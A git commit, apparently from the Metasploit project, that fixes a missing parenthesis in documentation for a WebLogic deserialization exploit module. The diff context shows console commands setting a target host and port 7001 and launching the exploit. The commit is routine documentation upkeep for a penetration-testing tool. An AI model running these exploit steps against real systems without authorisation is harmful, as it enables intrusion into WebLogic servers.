Fix a typo in the documentation

master
Andres Rodriguez 2018-12-16 23:51:20 -08:00
parent f05ea634a3
commit 4660f83768
1 changed files with 1 additions and 1 deletions

View File

@ -16,7 +16,7 @@
```
msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > set rhost 192.168.192.6
rhost => 192.168.192.6
msf exploit(multi/misc/weblogic_deserialize_marshalledobject > set rport 7001
msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > set rport 7001
rport => 7001
msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > exploit